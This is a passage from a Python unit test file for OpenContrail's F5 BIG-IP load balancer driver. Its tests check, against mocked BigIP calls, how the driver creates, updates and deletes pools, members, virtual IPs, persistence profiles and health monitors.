loadbalancer_agent.LoadbalancerAgent(self.svc, self.vnc_lib, self.cassandra, self._args) self.svc.loadbalancer_agent = self.lb_agent sas = config_db.ServiceApplianceSetSM.get('opencontrail') self.assertEqual(sas.driver, "svc_monitor.services.loadbalancer.drivers.ha_proxy.driver.\ OpencontrailLoadbalancerDriver") sas.add() DBBase.init(self.svc, None, self.cassandra) config_db.ServiceApplianceSetSM._cassandra.object_read = \ mock.Mock(side_effect=sas_read_side_effect) import sys sys.modules['f5'] = mock.Mock() sys.modules['f5.bigip'] = mock.Mock() self.create_f5_service_appliance_set() # end setUp def create_f5_service_appliance_set(self): sas_obj = {} sas_obj['fq_name'] = ["default-global-system-config", "f5"] sas_obj['uuid'] = 'f5-sas' sas_obj['display_name'] = "f5" sas = config_db.ServiceApplianceSetSM.locate(sas_obj['uuid'], sas_obj) sas.kvpairs = [{'key': 'sync_mode', 'value': 'replication'}, {'key': 'num_snat', 'value': '1'}, {'key': 'global_routed_mode', 'value': 'True'}, {'key': 'vip_vlan', 'value': 'access'}, {'key': 'use_snat', 'value': 'True'}] sas.ha_mode = "standalone" sas.driver = "svc_monitor.services.loadbalancer.drivers.f5.f5_driver.OpencontrailF5LoadbalancerDriver" sa_obj = {} sa_obj['fq_name'] = ["default-global-system-config", "f5", "bigip"] sa_obj['uuid'] = 'bigip' sa_obj['display_name'] = 'bigip' sa_obj['parent_uuid'] = 'f5-sas' sa_obj['service_appliance_ip_address'] = "1.1.1.1" sa_obj['service_appliance_user_credentials'] = {'username': "admin", 'password': "contrail123"} sa = config_db.ServiceApplianceSM.locate(sa_obj['uuid'], sa_obj) def test_decorate_name(name1, name2): return name1+'_'+name2 bigip_patcher = \ mock.patch('svc_monitor.services.loadbalancer.drivers.f5.f5_driver.f5_bigip.BigIP') self._mock_BigIp = bigip_patcher.start() self._mock_BigIp.return_value.cluster.get_traffic_groups.return_value = [] bigip_interface_patcher = \ mock.patch('svc_monitor.services.loadbalancer.drivers.f5.f5_driver.bigip_interfaces') self._mock_bigip_interfaces = bigip_interface_patcher.start() self._mock_bigip_interfaces.decorate_name = \ mock.Mock(side_effect=test_decorate_name) sas.add() def tearDown(self): self._mock_BigIp.reset_mock() config_db.ServiceApplianceSetSM.delete("opencontrail") config_db.ServiceApplianceSetSM.delete("f5-sas") config_db.ServiceApplianceSM.delete("bigip") config_db.LoadbalancerPoolSM.reset() config_db.VirtualIpSM.reset() config_db.InstanceIpSM.reset() config_db.VirtualMachineInterfaceSM.reset() config_db.VirtualNetworkSM.reset() config_db.ProjectSM.reset() # end tearDown def create_pool(self, uuid, fq_name_str, project=None, vip=None, hm=None): pool_network = self.create_vn("fake-pool-vn", "fake-pool-vn", project) pool_obj = {} pool_obj['fq_name'] = fq_name_str.split(':') pool_obj['uuid'] = uuid pool_obj['display_name'] = fq_name_str pool_obj['parent_uuid'] = 'tenant' pool_obj['id_perms'] = {'enable': 'true', 'description': 'Test pool'} pool_obj['loadbalancer_pool_provider'] = 'f5' pool_obj['loadbalancer_pool_properties'] = \ {'protocol': 'HTTP', 'subnet_id': 'pool_subnet_id', 'loadbalancer_method': 'ROUND_ROBIN', 'admin_state': True, 'session_persistence': None, 'persistence_cookie_name': None} if vip: pool_obj['virtual_ip_back_refs']=[{'uuid': vip.uuid}] if hm: pool_obj['loadbalancer_healthmonitor_refs']=[{'uuid': hm.uuid}] pool = config_db.LoadbalancerPoolSM.locate(pool_obj['uuid'], pool_obj) return pool # end create_pool def create_hm_obj(self, fq_name_str): hm_obj = {} hm_obj['fq_name'] = fq_name_str.split(':') hm_obj['uuid'] = fq_name_str hm_obj['display_name'] = fq_name_str hm_obj['parent_uuid'] = 'tenant' hm_obj['id_perms'] = {'enable': 'true', 'description': 'Test pool'} hm_obj['loadbalancer_healthmonitor_properties'] = {'delay': '5', 'expected_codes': '200', 'max_retries': '200', 'http_method': 'GET', 'timeout': '2', 'url_path': '/', 'monitor_type': 'HTTP', 'admin_state': True} return hm_obj #end create_hm_obj def create_hm(self, fq_name_str): hm_obj = self.create_hm_obj(fq_name_str) hm = config_db.HealthMonitorSM.locate(hm_obj['uuid'], hm_obj) return hm # end create_hm def update_pool(self, pool_obj, vip=None): pool_obj.params['loadbalancer_method'] = 'LEAST_CONNECTIONS' pool_obj.params['protocol'] = 'HTTPS' pool_obj.params['admin_state'] = False # end update_pool def update_vip(self, vip_obj, pool=None): vip_obj.params['connection_limit'] = '100' vip_obj.params['persistence_type'] = 'always' vip_obj.params['admin_state'] = False # end update_vip def create_pool_members(self, pool_name, num_members): for i in range(num_members): self.create_pool_member(pool_name, 'member_'+str(i), '10.1.1.'+str(i)) # end create_pool_members def create_pool_member(self, pool_name, member_name, member_address): pool_member_obj = {} pool_member_obj['fq_name'] = member_name pool_member_obj['uuid'] = member_name pool_member_obj['display_name'] = member_name pool_member_obj['parent_uuid'] = pool_name pool_member_obj['id_perms'] = \ {'enable': 'true', 'description': 'Test pool member'} pool_member_obj['loadbalancer_member_properties'] = \ {'protocol_port': '80', 'address': member_address, 'weight': '1', 'status': 'up', 'admin_state': True} member = config_db.LoadbalancerMemberSM.locate(pool_member_obj['uuid'], pool_member_obj) # end create_pool_member def create_project(self, name, uuid): project = Project(name=name, fq_name=["default-domain", name]) project.uuid = uuid proj_dict = self.obj_to_dict(project) config_db.ProjectSM.locate(uuid, proj_dict) return project # end create_project def create_vn(self, name, uuid, parent_obj): network = VirtualNetwork(name=name, parent_obj=parent_obj) network.uuid = uuid net_dict = self.obj_to_dict(network) config_db.VirtualNetworkSM.locate(uuid, net_dict) return network # end create_vn def obj_to_dict(self, obj): def to_json(obj): if hasattr(obj, 'serialize_to_json'): return obj.serialize_to_json(obj.get_pending_updates()) else: return dict((k, v) for k, v in obj.__dict__.iteritems()) return json.loads(json.dumps(obj, default=to_json)) # end obj_to_dict def create_vmi(self, name, uuid, parent_obj, net_obj): vmi = VirtualMachineInterface(name=name, parent_obj=parent_obj) vmi.set_virtual_network(net_obj) vmi.uuid = uuid vmi_dict = self.obj_to_dict(vmi) config_db.VirtualMachineInterfaceSM.locate(uuid, vmi_dict) return vmi # end create_vmi def create_iip(self, name, uuid, ip, net_obj, vmi_obj): iip = InstanceIp(name=name, instance_ip_address=ip, instance_ip_family="v4") iip.set_virtual_network(net_obj) iip.set_virtual_machine_interface(vmi_obj) iip.uuid = uuid iip_dict = self.obj_to_dict(iip) config_db.InstanceIpSM.locate(uuid, iip_dict) return iip # end create_iip def create_vip(self, vip, project): vip_obj = {} vip_obj['fq_name'] = vip.split(':') vip_obj['uuid'] = vip vip_obj['display_name'] = vip vip_obj['id_perms'] = {'enable': 'true', 'description': 'Test pool'} vip_obj['virtual_ip_properties'] = {'status': 'UP', 'protocol_port': '80', 'subnet_id': 'vip_subnet_id', 'protocol': 'HTTP', 'admin_state': True, 'connection_limit': '-1', 'persistence_type': None, 'persistence_cookie_name': None, 'address': '1.1.1.1'} network = self.create_vn("fake-vip-vn", "fake-vip-vn", project) vmi = self.create_vmi("vmi", "vmi", project, network) iip = self.create_iip("iip", "iip", "1.1.1.1", network, vmi) vip_vnc = VirtualIp.from_dict(**vip_obj) vip_vnc.set_virtual_machine_interface(vmi) vip_obj = self.obj_to_dict(vip_vnc) vip_obj['parent_uuid'] = 'tenant' vip = config_db.VirtualIpSM.locate(vip, vip_obj) return vip # end create_vip def test_add_delete_pool_with_members_vip(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) self.create_pool_members("test-lb-pool", 5) pool.add() self.assertEqual(len(self._db), 1) self.assertTrue('test-lb-pool' in self._db) # Ensure we call the BigIp with correct ip, user name and password self._mock_BigIp.assert_called_with('1.1.1.1', 'admin', 'contrail123', 5, True, True) self._mock_BigIp.return_value.pool.create.assert_called_with( description='test-lb-pool:Test pool', folder='tenant', lb_method='ROUND_ROBIN', name='test-lb-pool') expected_calls_to_add_member = \ [mock.call(folder='tenant', ip_address='10.1.1.4%0', name='test-lb-pool', no_checks=True, port=80), mock.call(folder='tenant', ip_address='10.1.1.3%0', name='test-lb-pool', no_checks=True, port=80), mock.call(folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80), mock.call(folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', no_checks=True, port=80), mock.call(folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', no_checks=True, port=80)] call_list = self._mock_BigIp.return_value.pool.add_member.call_args_list self.assertEqual(call_list, expected_calls_to_add_member) expected_calls_to_enable_member = expected_calls_to_add_member call_list = \ self._mock_BigIp.return_value.pool.enable_member.call_args_list self.assertEqual(call_list, expected_calls_to_enable_member) expected_calls_to_set_member_ratio = \ [mock.call(folder='tenant', ip_address='10.1.1.4%0', name='test-lb-pool', no_checks=True, port=80, ratio=1), mock.call(folder='tenant', ip_address='10.1.1.3%0', name='test-lb-pool', no_checks=True, port=80, ratio=1), mock.call(folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80, ratio=1), mock.call(folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', no_checks=True, port=80, ratio=1), mock.call(folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', no_checks=True, port=80, ratio=1)] call_list = \ self._mock_BigIp.return_value.pool.set_member_ratio.call_args_list self.assertEqual(call_list, expected_calls_to_set_member_ratio) self._mock_BigIp.return_value.virtual_server.create.assert_called_with( folder='tenant', ip_address='1.1.1.1%0', mask='255.255.255.255', name='vip', port=80, preserve_vlan_name=True, protocol='HTTP', snat_pool=None, traffic_group='/Common/traffic-group-1', use_snat=True, vlan_name='access') self._mock_BigIp.return_value.virtual_server.set_description.assert_called_with( description='vip:Test pool', folder='tenant', name='vip') self._mock_BigIp.return_value.virtual_server.set_pool.assert_called_with( folder='tenant', name='vip', pool_name='test-lb-pool') self._mock_BigIp.return_value.virtual_server.enable_virtual_server.assert_called_with( folder='tenant', name='vip') # Cleanup for i in range(5): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') self._mock_BigIp.return_value.virtual_server.delete.assert_called_with( folder='tenant', name='vip') expected_calls_to_remove_member = \ [mock.call(folder='tenant', ip_address='10.1.1.4%0', name='test-lb-pool', port=80), mock.call(folder='tenant', ip_address='10.1.1.3%0', name='test-lb-pool', port=80), mock.call(folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', port=80), mock.call(folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', port=80), mock.call(folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', port=80)] call_list = self._mock_BigIp.return_value.pool.remove_member.call_args_list self.assertEqual(call_list, expected_calls_to_remove_member) self._mock_BigIp.return_value.pool.delete.assert_called_with( folder='tenant', name='test-lb-pool') self.assertEqual(len(self._db), 0) # end test_add_delete_pool_with_members_vip def test_add_delete_pool_with_members_vip_hm(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) hm_obj = self.create_hm_obj("test-hm") hm_obj['loadbalancer_pool_back_refs']=[{'uuid': pool.uuid}] hm = config_db.HealthMonitorSM.locate(hm_obj['uuid'], hm_obj) self.create_pool_members("test-lb-pool", 2) pool.add() self._mock_BigIp.return_value.monitor.create.assert_called_with( folder='tenant', interval='5', mon_type='HTTP', name='test-hm', recv_text=None, send_text=None, timeout=400) self._mock_BigIp.return_value.pool.add_monitor.assert_called_with( folder='tenant', monitor_name='test-hm', name='test-lb-pool') self._mock_BigIp.return_value.monitor.set_send_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', send_text='GET / HTTP/1.0\\r\\n\\r\\n') self._mock_BigIp.return_value.monitor.set_recv_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', recv_text='HTTP/1\\.(0|1) 200') self.assertEqual(len(self._db), 1) self.assertTrue('test-lb-pool' in self._db) # Cleanup for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') config_db.HealthMonitorSM.delete('test-hm') self._mock_BigIp.return_value.monitor.delete.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm') self.assertEqual(len(self._db), 0) # end test_add_delete_pool_with_members_vip_hm def test_update_pool(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) self.create_pool_members("test-lb-pool", 2) pool.add() self._mock_BigIp.reset_mock() pool.id_perms['description'] = 'updated' pool.add() self._mock_BigIp.return_value.pool.set_description.assert_called_with( description='test-lb-pool:updated', folder='tenant', name='test-lb-pool') self._mock_BigIp.reset_mock() pool.params['loadbalancer_method'] = 'LEAST_CONNECTIONS' pool.add() self._mock_BigIp.return_value.pool.set_lb_method.assert_called_with( folder='tenant', lb_method='LEAST_CONNECTIONS', name='test-lb-pool') # Cleanup for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') # end test_update_pool # Test the case where vip is deleted before the pool def test_update_pool_1(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) self.create_pool_members("test-lb-pool", 2) pool.add() # Delete the VIP config_db.VirtualIpSM.delete('vip') # update the pool with no vip pool.add() self._mock_BigIp.return_value.virtual_server.delete.assert_called_with( folder='tenant', name='vip') expected_calls_to_remove_member = \ [mock.call(folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', port=80), mock.call(folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', port=80)] call_list = self._mock_BigIp.return_value.pool.remove_member.call_args_list self.assertEqual(call_list, expected_calls_to_remove_member) self._mock_BigIp.return_value.pool.delete.assert_called_with( folder='tenant', name='test-lb-pool') self.assertEqual(len(self._db), 1) # Cleanup for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) self._mock_BigIp.reset_mock() self.assertFalse(self._mock_BigIp.return_value.pool.delete.called) self.assertFalse(self._mock_BigIp.return_value.pool.remove_member.called) self.assertFalse(self._mock_BigIp.return_value.virtual_server.delete.called) config_db.LoadbalancerPoolSM.delete('test-lb-pool') # end test_update_pool def test_update_pool_members_add_delete(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) self.create_pool_members("test-lb-pool", 2) pool.add() self._mock_BigIp.reset_mock() self.create_pool_members("test-lb-pool", 3) pool.add() # Ensure that only the new member is added self._mock_BigIp.return_value.pool.add_member.assert_called_with( folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80) self._mock_BigIp.return_value.pool.enable_member.assert_called_with( folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80) self._mock_BigIp.return_value.pool.set_member_ratio.assert_called_with( folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80, ratio=1) # Delete last two members self._mock_BigIp.reset_mock() for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i+1)) pool.add() expected_calls_to_remove_member =\ [mock.call(folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', port=80), mock.call(folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', port=80)] call_list = self._mock_BigIp.return_value.pool.remove_member.call_args_list self.assertEqual(call_list, expected_calls_to_remove_member) # Cleanup config_db.LoadbalancerMemberSM.delete('member_0') config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') # end test_update_pool_members_add_delete def test_update_pool_member_props(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) self.create_pool_members("test-lb-pool", 2) pool.add() # Validate member ratio update self._mock_BigIp.reset_mock() member = config_db.LoadbalancerMemberSM.get('member_0') member.params['weight'] = 20 pool.add() self._mock_BigIp.return_value.pool.set_member_ratio.assert_called_with( folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', no_checks=True, port=80, ratio=20) self._mock_BigIp.reset_mock() # Validate member admin_state update member = config_db.LoadbalancerMemberSM.get('member_1') member.params['admin_state'] = False pool.add() self._mock_BigIp.return_value.pool.disable_member.assert_called_with( folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', no_checks=True, port=80) self._mock_BigIp.reset_mock() member = config_db.LoadbalancerMemberSM.get('member_1') member.params['admin_state'] = True pool.add() self._mock_BigIp.return_value.pool.enable_member.assert_called_with( folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', no_checks=True, port=80) # Cleanup for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') # end test_update_pool_member_props def test_update_pool_members_add_delete_update(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) for i in range(2): self.create_pool_member("test-lb-pool", 'member_'+str(i), '10.1.1.'+str(i)) pool.add() self._mock_BigIp.reset_mock() # Existing member 1,2 # New member 3 # delete the member 1 # Final meber 2,3 self.create_pool_member("test-lb-pool", 'member_2', '10.1.1.2') config_db.LoadbalancerMemberSM.delete('member_0') member = config_db.LoadbalancerMemberSM.get('member_1') member.params['admin_state'] = False pool.add() # validate # member_1 updated with admin state disable self._mock_BigIp.return_value.pool.disable_member.assert_called_with( folder='tenant', ip_address='10.1.1.1%0', name='test-lb-pool', no_checks=True, port=80) # member_0 removed self._mock_BigIp.return_value.pool.remove_member.assert_called_with( folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', port=80) # member_2 added self._mock_BigIp.return_value.pool.add_member.assert_called_with( folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80) self._mock_BigIp.return_value.pool.enable_member.assert_called_with( folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80) self._mock_BigIp.return_value.pool.set_member_ratio.assert_called_with( folder='tenant', ip_address='10.1.1.2%0', name='test-lb-pool', no_checks=True, port=80, ratio=1) # Cleanup config_db.LoadbalancerMemberSM.delete('member_1') config_db.LoadbalancerMemberSM.delete('member_2') config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') # end test_update_pool_members_add_delete def test_pool_for_tcp(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) vip.params['protocol'] = 'FTP' vip.params['protocol_port'] = '22' vip.params['connection_limit'] = '12' pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) pool.params['protocol'] = 'FTP' pool.params['loadbalancer_method'] = 'SOURCE_IP' self.create_pool_members("test-lb-pool", 1) member_0 = config_db.LoadbalancerMemberSM.get('member_0') member_0.params['protocol_port'] = '23' pool.add() # Validate calls with correct port self._mock_BigIp.return_value.pool.create.assert_called_with( description='test-lb-pool:Test pool', folder='tenant', lb_method='SOURCE_IP', name='test-lb-pool') self._mock_BigIp.return_value.pool.add_member.assert_called_with( folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', no_checks=True, port=23) self._mock_BigIp.return_value.pool.enable_member.assert_called_with( folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', no_checks=True, port=23) self._mock_BigIp.return_value.pool.set_member_ratio.assert_called_with( folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', no_checks=True, port=23, ratio=1) self._mock_BigIp.return_value.virtual_server.create.assert_called_with( folder='tenant', ip_address='1.1.1.1%0', mask='255.255.255.255', name='vip', port=22, preserve_vlan_name=True, protocol='FTP', snat_pool=None, traffic_group='/Common/traffic-group-1', use_snat=True, vlan_name='access') self._mock_BigIp.return_value.virtual_server.set_description.assert_called_with( description='vip:Test pool', folder='tenant', name='vip') self._mock_BigIp.return_value.virtual_server.set_pool.assert_called_with( folder='tenant', name='vip', pool_name='test-lb-pool') self._mock_BigIp.return_value.virtual_server.enable_virtual_server.assert_called_with( folder='tenant', name='vip') self._mock_BigIp.return_value.virtual_server.remove_all_persist_profiles.assert_called_with( folder='tenant', name='vip') self._mock_BigIp.return_value.virtual_server.set_connection_limit.assert_called_with( connection_limit=12, folder='tenant', name='vip') self._mock_BigIp.reset_mock() # Cleanup config_db.LoadbalancerMemberSM.delete('member_0') config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') self._mock_BigIp.return_value.virtual_server.delete.assert_called_with( folder='tenant', name='vip') self._mock_BigIp.return_value.pool.remove_member.assert_called_with( folder='tenant', ip_address='10.1.1.0%0', name='test-lb-pool', port=23) self._mock_BigIp.return_value.pool.delete.assert_called_with( folder='tenant', name='test-lb-pool') self._mock_BigIp.return_value.arp.delete_all.assert_called_with( folder='tenant') self._mock_BigIp.return_value.decorate_folder.assert_called_with('tenant') self.assertTrue(self._mock_BigIp.return_value.system.delete_folder.called) # end test_update_vip def test_update_vip(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) self.create_pool_members("test-lb-pool", 2) pool.add() # Validate vip update self._mock_BigIp.reset_mock() vip.id_perms['description'] = "New Description" pool.add() self._mock_BigIp.return_value.virtual_server.set_description.assert_called_with( description='vip:New Description', folder='tenant', name='vip') self._mock_BigIp.reset_mock() vip.params['admin_state'] = False pool.add() self._mock_BigIp.return_value.virtual_server.disable_virtual_server.assert_called_with( folder='tenant', name='vip') vip.params['admin_state'] = True pool.add() self._mock_BigIp.return_value.virtual_server.enable_virtual_server.assert_called_with( folder='tenant', name='vip') self._mock_BigIp.reset_mock() vip.params['connection_limit'] = '100' pool.add() # Cleanup for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') # end test_update_vip def test_update_vip_persistance_type(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) vip.params['persistence_type'] = 'SOURCE_IP' pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) self.create_pool_members("test-lb-pool", 1) pool.add() # Test with persistence_type = HTTP_COOKIE self._mock_BigIp.reset_mock() vip.params['persistence_type'] = 'HTTP_COOKIE' pool.add() self._mock_BigIp.return_value.virtual_server.add_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/http') self._mock_BigIp.return_value.virtual_server.set_persist_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/cookie') # Test with persistence_type = APP_COOKIE self._mock_BigIp.reset_mock() vip.params['persistence_type'] = 'APP_COOKIE' pool.add() self._mock_BigIp.return_value.virtual_server.add_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/http') self._mock_BigIp.return_value.virtual_server.set_persist_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/cookie') # Test with persistence_type = APP_COOKIE, lb_method = SOURCE_IP self._mock_BigIp.reset_mock() pool.params['loadbalancer_method'] = 'SOURCE_IP' pool.add() self._mock_BigIp.return_value.pool.set_lb_method.assert_called_with( folder='tenant', lb_method='SOURCE_IP', name='test-lb-pool') self._mock_BigIp.return_value.virtual_server.add_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/http') self._mock_BigIp.return_value.virtual_server.set_persist_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/cookie') self._mock_BigIp.return_value.virtual_server.set_fallback_persist_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/source_addr') # Test with persistence_type = APP_COOKIE, lb_method = SOURCE_IP, # persistence_cookie_name = 'DumpKookie' self._mock_BigIp.reset_mock() vip.params['persistence_cookie_name'] = 'DumpKookie' pool.add() self._mock_BigIp.return_value.virtual_server.add_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/http') self._mock_BigIp.return_value.rule.create.assert_called_with( folder='tenant', name='app_cookie_vip', rule_definition='when HTTP_REQUEST {\n if { [HTTP::cookie DumpKookie] ne "" }{\n persist uie [string tolower [HTTP::cookie "DumpKookie"]] 3600\n }\n}\n\nwhen HTTP_RESPONSE {\n if { [HTTP::cookie "DumpKookie"] ne "" }{\n persist add uie [string tolower [HTTP::cookie "DumpKookie"]] 3600\n }\n}\n\n') self._mock_BigIp.return_value.virtual_server.create_uie_profile.assert_called_with( folder='tenant', name='app_cookie_vip', rule_name='app_cookie_vip') self._mock_BigIp.return_value.virtual_server.set_persist_profile.assert_called_with( folder='tenant', name='vip', profile_name='app_cookie_vip') self._mock_BigIp.return_value.virtual_server.set_fallback_persist_profile.assert_called_with( folder='tenant', name='vip', profile_name='/Common/source_addr') self._mock_BigIp.reset_mock() # Cleanup for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) config_db.LoadbalancerPoolSM.delete('test-lb-pool') config_db.VirtualIpSM.delete('vip') # end test_update_vip_persistance_type def test_update_hm(self): project = self.create_project("fake-project", "project") vip = self.create_vip('vip', project) pool = self.create_pool("test-lb-pool", "default-domain:admin:test-lb-pool", project, vip) hm_obj = self.create_hm_obj("test-hm") hm_obj['loadbalancer_pool_back_refs']=[{'uuid': pool.uuid}] hm = config_db.HealthMonitorSM.locate(hm_obj['uuid'], hm_obj) self.create_pool_members("test-lb-pool", 2) pool.add() self._mock_BigIp.reset_mock() hm_obj['loadbalancer_healthmonitor_properties']['max_retries'] = '100' config_db.HealthMonitorSM.update(hm, hm_obj) pool.add() self._mock_BigIp.return_value.monitor.set_interval.assert_called_with( folder='tenant', interval='5', mon_type='HTTP', name='test-hm') self._mock_BigIp.return_value.monitor.set_timeout.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', timeout=200) self._mock_BigIp.return_value.monitor.set_send_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', send_text='GET / HTTP/1.0\\r\\n\\r\\n') self._mock_BigIp.return_value.monitor.set_recv_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', recv_text='HTTP/1\\.(0|1) 200') self._mock_BigIp.reset_mock() hm_obj['loadbalancer_healthmonitor_properties']['delay'] = '100' config_db.HealthMonitorSM.update(hm, hm_obj) pool.add() self._mock_BigIp.return_value.monitor.set_interval.assert_called_with( folder='tenant', interval='100', mon_type='HTTP', name='test-hm') self._mock_BigIp.return_value.monitor.set_timeout.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', timeout=200) self._mock_BigIp.return_value.monitor.set_send_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', send_text='GET / HTTP/1.0\\r\\n\\r\\n') self._mock_BigIp.return_value.monitor.set_recv_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', recv_text='HTTP/1\\.(0|1) 200') self._mock_BigIp.reset_mock() hm_obj['loadbalancer_healthmonitor_properties']['expected_codes'] = '401' config_db.HealthMonitorSM.update(hm, hm_obj) pool.add() self._mock_BigIp.return_value.monitor.set_interval.assert_called_with( folder='tenant', interval='100', mon_type='HTTP', name='test-hm') self._mock_BigIp.return_value.monitor.set_timeout.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', timeout=200) self._mock_BigIp.return_value.monitor.set_send_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', send_text='GET / HTTP/1.0\\r\\n\\r\\n') self._mock_BigIp.return_value.monitor.set_recv_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', recv_text='HTTP/1\\.(0|1) 401') self._mock_BigIp.reset_mock() hm_obj['loadbalancer_healthmonitor_properties']['timeout'] = '10' config_db.HealthMonitorSM.update(hm, hm_obj) pool.add() self._mock_BigIp.return_value.monitor.set_interval.assert_called_with( folder='tenant', interval='100', mon_type='HTTP', name='test-hm') self._mock_BigIp.return_value.monitor.set_timeout.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', timeout=1000) self._mock_BigIp.return_value.monitor.set_send_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', send_text='GET / HTTP/1.0\\r\\n\\r\\n') self._mock_BigIp.return_value.monitor.set_recv_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', recv_text='HTTP/1\\.(0|1) 401') self._mock_BigIp.reset_mock() hm_obj['loadbalancer_healthmonitor_properties']['url_path'] = '/status-check' config_db.HealthMonitorSM.update(hm, hm_obj) pool.add() self._mock_BigIp.return_value.monitor.set_interval.assert_called_with( folder='tenant', interval='100', mon_type='HTTP', name='test-hm') self._mock_BigIp.return_value.monitor.set_timeout.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', timeout=1000) self._mock_BigIp.return_value.monitor.set_send_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', send_text='GET /status-check HTTP/1.0\\r\\n\\r\\n') self._mock_BigIp.return_value.monitor.set_recv_string.assert_called_with( folder='tenant', mon_type='HTTP', name='test-hm', recv_text='HTTP/1\\.(0|1) 401') self._mock_BigIp.reset_mock() hm_obj['loadbalancer_healthmonitor_properties']['monitor_type'] = 'PING' config_db.HealthMonitorSM.update(hm, hm_obj) pool.add() self._mock_BigIp.return_value.monitor.set_interval.assert_called_with( folder='tenant', interval='100', mon_type='PING', name='test-hm') self._mock_BigIp.return_value.monitor.set_timeout.assert_called_with( folder='tenant', mon_type='PING', name='test-hm', timeout=1000) self._mock_BigIp.reset_mock() # Cleanup for i in range(2): config_db.LoadbalancerMemberSM.delete('member_'+str(i)) 